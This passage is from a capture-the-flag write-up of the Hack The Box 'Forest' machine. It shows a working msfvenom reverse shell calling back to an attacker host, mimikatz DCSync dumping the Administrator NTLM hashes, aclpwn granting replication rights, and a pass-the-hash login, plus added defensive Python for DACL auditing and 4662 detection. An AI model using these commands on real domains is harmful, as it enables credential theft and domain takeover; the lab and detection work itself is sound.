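The path above ends in WriteDacl on the domain object, and the last task uses it to grant replication (DCSync) rights to a service account. The following is an added example, not part of the original notes or of aclpwn: it parses the SDDL string of a domain object's security descriptor and reports unexpected trustees holding WriteDacl or the replication extended rights. The SIDs, RIDs and sample SDDL are constructed, and the allowlist of expected trustees is an assumption to tune per environment.

```python
# Added example: audit a domain head DACL (SDDL form) for DCSync-related rights.
import re

# Extended-right GUIDs that together permit directory replication (DCSync).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumed allowlist of SDDL trustee aliases (Domain/Enterprise Admins, builtin
# Administrators, SYSTEM, domain controller groups). Adjust for your domain.
EXPECTED = {"DA", "EA", "BA", "SY", "ED", "DD", "RO"}

WRITE_DAC, CONTROL_ACCESS, GENERIC_ALL = 0x40000, 0x100, 0x10000000
RIGHT_BITS = {"WD": WRITE_DAC, "CR": CONTROL_ACCESS, "GA": GENERIC_ALL}

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")

SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
SAMPLE_SDDL = (  # constructed descriptor, not taken from the lab host
    "O:BAG:BAD:AI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    f"(A;CI;WD;;;{SID}-1121)"  # constructed RID: a group holding WriteDacl
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{SID}-1147)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{SID}-1147)"
    "S:AI(AU;SA;WPWDWO;;;WD)"
)


def rights_mask(rights):
    """SDDL rights are either hex (0x...) or a run of two-letter codes."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for code in re.findall("..", rights):
        mask |= RIGHT_BITS.get(code, 0)  # only the three bits audited here
    return mask


def audit_domain_dacl(sddl, expected=EXPECTED):
    """Return {trustee: set of findings} for trustees outside the allowlist."""
    findings = {}
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not dacl:
        return findings
    for ace_type, flags, rights, obj, _inherit, trustee in ACE_RE.findall(dacl.group(1)):
        if ace_type not in ("A", "OA") or trustee in expected:
            continue  # only allow ACEs for unexpected trustees matter here
        if "IO" in re.findall("..", flags):
            continue  # inherit-only: does not apply to the domain object itself
        mask, obj, hits = rights_mask(rights), obj.lower(), set()
        if not obj and mask & (WRITE_DAC | GENERIC_ALL):
            hits.add("WriteDacl")  # can rewrite the DACL and grant itself anything
        if mask & (CONTROL_ACCESS | GENERIC_ALL):
            if not obj:
                hits.update(REPL_RIGHTS.values())  # all extended rights
            elif obj in REPL_RIGHTS:
                hits.add(REPL_RIGHTS[obj])
        if hits:
            findings.setdefault(trustee, set()).update(hits)
    return findings


def dcsync_capable(findings):
    """Trustees holding both replication rights, i.e. able to replicate secrets."""
    needed = set(REPL_RIGHTS.values())
    return sorted(t for t, hits in findings.items() if needed <= hits)


if __name__ == "__main__":
    result = audit_domain_dacl(SAMPLE_SDDL)
    for trustee, hits in sorted(result.items()):
        print(trustee, sorted(hits))
    print("DCSync-capable:", dcsync_capable(result))
```

Running the same audit before and after a change to the domain object shows exactly which trustee gained rights, which is what the aclpwn restore file is meant to undo.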

Now I need to run mimikatz, so I will upload a reverse shell and catch it on my computer so I can run mimikatz there, as mimikatz has issues running under evil-winrm from previous experience

Creating the reverse shell – msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe

Evil-WinRM PS C:\Users\svc-alfresco\Documents> ./shell.exe

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ls
20230909054106_BloodHound.zip  aclpwn-20230909-084819.restore  aclpwn.py  active.gnmap  active.nmap  active.xml  forest  kerbrute  SharpHound.exe  shell.exe  users.txt
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/shell.exe
                                        
Info: Uploading /home/kali/HTB/Forest/shell.exe to C:\Users\svc-alfresco\Documents\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/9/2023   5:41 AM          15180 20230909054106_BloodHound.zip
-a----         9/9/2023   5:41 AM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/9/2023   5:40 AM         833536 SharpHound.exe
-a----         9/9/2023   6:06 AM           7168 shell.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/mimikatz.exe
                                        
Info: Uploading /home/kali/HTB/Forest/mimikatz.exe to C:\Users\svc-alfresco\Documents\mimikatz.exe
                                        
Data: 1236512 bytes of 1236512 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/9/2023   5:41 AM          15180 20230909054106_BloodHound.zip
-a----         9/9/2023   6:10 AM         927384 mimikatz.exe
-a----         9/9/2023   5:41 AM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/9/2023   5:40 AM         833536 SharpHound.exe
-a----         9/9/2023   6:06 AM           7168 shell.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./shell.exe

We capture the shell on our machine


┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-alfresco\Documents>


We run the command lsadump::dcsync /domain:htb.local /user:Administrator in mimikatz, which doesn't seem to be working

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-alfresco\Documents>./mimikatz.exe
./mimikatz.exe
'.' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\svc-alfresco\Documents>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
ERROR mimikatz_doLocal ; "mimikatz" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz # ERROR mimikatz_doLocal ; "[DC]" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz # 

We can try Invoke-Mimikatz.ps1 instead: Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'

but we get the same error as above

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied 
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

We run the aclpwn command again and choose path 1

┌──(kali㉿kali)-[~]
└─$  ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain,Base)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-093211.restore
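
The change aclpwn reports above ("Modifying domain DACL to give DCSync rights") can be checked from the defender's side by auditing the domain root's security descriptor. The following is an added example, not part of the original write-up: it parses an SDDL string and lists trustees outside an allowlist that hold both replication rights. The sample SDDL, its SIDs and the allowlist are constructed assumptions.

```python
import re

# Extended rights (schema rightsGuid values) that together allow DCSync.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Assumed allowlist of SDDL aliases: Administrators, Enterprise DCs, Domain Controllers.
EXPECTED = {"BA", "ED", "DD"}
# Constructed sample SDDL for a domain root; the S-1-5-21-1-2-3-* SIDs are made up.
SAMPLE_SDDL = (
    "O:BAG:BAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1601)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1601)"
    "(OA;CIIO;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1-2-3-1602)"
    "(A;;RPLCLORC;;;AU)"
    "(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;S-1-5-21-1-2-3-1603)"
)

def codes(s):
    """Split an SDDL flag or rights string into its two-letter codes."""
    return {s[i:i + 2] for i in range(0, len(s), 2)}

def grants_control_access(rights):
    if rights.lower().startswith("0x"):            # numeric access mask
        return bool(int(rights, 16) & 0x10000100)  # CONTROL_ACCESS or GENERIC_ALL
    return bool(codes(rights) & {"CR", "GA"})

def replication_grants(sddl):
    """Map trustee -> replication rights granted by allow ACEs on the object itself."""
    grants = {}
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        f = ace.split(";")
        if len(f) != 6 or f[0] not in ("A", "OA") or "IO" in codes(f[1]):
            continue                               # not an allow ACE, or inherit-only
        if not grants_control_access(f[2]):
            continue
        guid = f[3].lower()
        if guid and guid not in REPL_RIGHTS:
            continue                               # some other extended right
        # An empty object GUID means the ACE covers every extended right.
        names = {REPL_RIGHTS[guid]} if guid else set(REPL_RIGHTS.values())
        grants.setdefault(f[5], set()).update(names)
    return grants

def unexpected_dcsync_trustees(sddl, expected=EXPECTED):
    """Trustees outside the allowlist holding both rights that DCSync needs."""
    return sorted(t for t, n in replication_grants(sddl).items()
                  if t not in expected and len(n) == len(REPL_RIGHTS))
```

On a domain controller the input string can be taken from (Get-Acl "AD:DC=htb,DC=local").Sddl; the allowlist should be adjusted to the principals that legitimately replicate in the environment.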

Then we try mimikatz again, and this time we get the hash

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied 
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+             $Processors = Get-WmiObject -Class Win32_Processor
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ...        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565

  .#####.   mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Principal Name  : [email protected]
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID   : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
    ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
    ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
    ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
    lm  - 0: 9498c81fd53411e023fcd1ff4cd3e482
    lm  - 1: f505fe58b1dedbe3015454d212af5115

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : cad4a87763ba795c795b96486148bb95

* Primary:Kerberos-Newer-Keys *
    Default Salt : HTB.LOCALAdministrator
    Default Iterations : 4096
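
The successful DCSync above is a replication request made by a user account rather than a domain controller, which is what a detection can key on. The following is an added example, not part of the original write-up: it scans Security event 4662 records for the two replication GUIDs used by any account other than the known DC machine account. The JSON-lines export format, the sample events and the allowlist are constructed assumptions.

```python
import json
import re

REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Assumption: FOREST is the only DC, so only its machine account should replicate.
KNOWN_REPLICATORS = {"forest$"}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Constructed sample: Security event records exported as JSON lines.
SAMPLE_EVENTS = """
{"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100", "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "WS01$", "AccessMask": "0x100", "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"}
{"EventID": 4662, "SubjectUserName": "helpdesk", "AccessMask": "0x10", "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"}
{"EventID": 4624, "SubjectUserName": "svc-alfresco"}
"""

def dcsync_suspects(lines, known=KNOWN_REPLICATORS):
    """Return {account: sorted replication GUIDs used} for unexpected replicators."""
    hits = {}
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0"), 16) & 0x100:  # control-access operations only
            continue
        user = ev.get("SubjectUserName", "")
        found = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        used = found & REPL_GUIDS
        # Match against named DCs instead of trusting any name that ends in "$".
        if used and user.lower() not in known:
            hits.setdefault(user, set()).update(used)
    return {u: sorted(g) for u, g in hits.items()}

if __name__ == "__main__":
    for account, guids in dcsync_suspects(SAMPLE_EVENTS.splitlines()).items():
        print(f"replication rights used by non-DC account {account}: {guids}")
```

Event 4662 is only logged when Directory Service Access auditing is enabled on the domain controller.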

We use evil-winrm to pass the hash: evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.161 -u  Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/20/2019   4:04 PM                Contacts
d-r---        9/23/2019   2:15 PM                Desktop
d-r---        9/23/2019   3:46 PM                Documents
d-r---        9/20/2019   4:04 PM                Downloads
d-r---        9/20/2019   4:04 PM                Favorites
d-r---        9/20/2019   4:04 PM                Links
d-r---        9/20/2019   4:04 PM                Music
d-r---        9/20/2019   4:04 PM                Pictures
d-r---        9/20/2019   4:04 PM                Saved Games
d-r---        9/20/2019   4:04 PM                Searches
d-r---        9/20/2019   4:04 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/9/2023   5:38 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
cdb539c41b826bb97ec6dfbf750a375d
*Evil-WinRM* PS C:\Users\Administrator\Desktop>